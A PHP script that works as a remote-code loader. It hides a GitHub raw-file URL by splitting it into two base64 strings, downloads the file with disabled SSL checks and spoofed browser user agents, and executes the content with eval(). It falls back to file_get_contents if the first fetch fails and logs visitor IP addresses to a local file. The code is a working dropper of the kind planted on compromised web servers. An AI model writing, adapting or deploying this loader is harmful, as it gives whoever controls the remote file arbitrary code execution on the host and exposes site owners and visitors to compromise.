<?php
$part_a = 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL';
$part_b = '2x1ZmZ5b3BtL29wbS9yZWZzL2hlYWRzL21haW4vMy50eHQ=';
$url = base64_decode($part_a . $part_b);

function getRemoteData($target_url) {
    $curl = curl_init();
    $agents = [
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15'
    ];
    $headers = [
        'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language: en-US,en;q=0.9',
        'Connection: keep-alive'
    ];
    curl_setopt_array($curl, [
        CURLOPT_URL => $target_url,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_TIMEOUT => 20,
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => 0,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_USERAGENT => $agents[array_rand($agents)],
        CURLOPT_HTTPHEADER => $headers
    ]);
    $data = curl_exec($curl);
    $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    $err = curl_error($curl);
    curl_close($curl);
    return ['ok' => ($status === 200 && $data), 'data' => $data, 'err' => $err, 'status' => $status];
}

function prepareCode($raw_code) {
    $raw_code = str_replace("\xEF\xBB\xBF", '', $raw_code);
    $raw_code = trim($raw_code);
    if (!mb_check_encoding($raw_code, 'UTF-8')) {
        $raw_code = mb_convert_encoding($raw_code, 'UTF-8');
    }
    return $raw_code;
}

$response = getRemoteData($url);

if ($response['ok']) {
    $externalCode = $response['data'];
    $externalCode = prepareCode($externalCode);
    if (strpos($externalCode, '<?php') === 0 || strpos($externalCode, '<?=') === 0) {
        eval('?>' . $externalCode);
    } else {
        eval($externalCode);
    }
} else {
    echo "<div>Error: HTTP " . $response['status'] . "</div>";
    echo "<div>" . htmlspecialchars($response['err']) . "</div>";
    ini_set('allow_url_fopen', 1);
    $altData = @file_get_contents($url);
    if ($altData !== false) {
        eval('?>' . $altData);
    }
}

function saveLog($url, $ok, $err = '') {
    $log = __DIR__ . '/run_log.txt';
    $time = date('Y-m-d H:i:s');
    $ip = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    $entry = "[$time] IP: $ip | URL: $url | Status: " . ($ok ? 'OK' : 'FAIL') . " | Error: $err\n";
    @file_put_contents($log, $entry, FILE_APPEND);
}

saveLog($url, $response['ok'], $response['err']);
?>
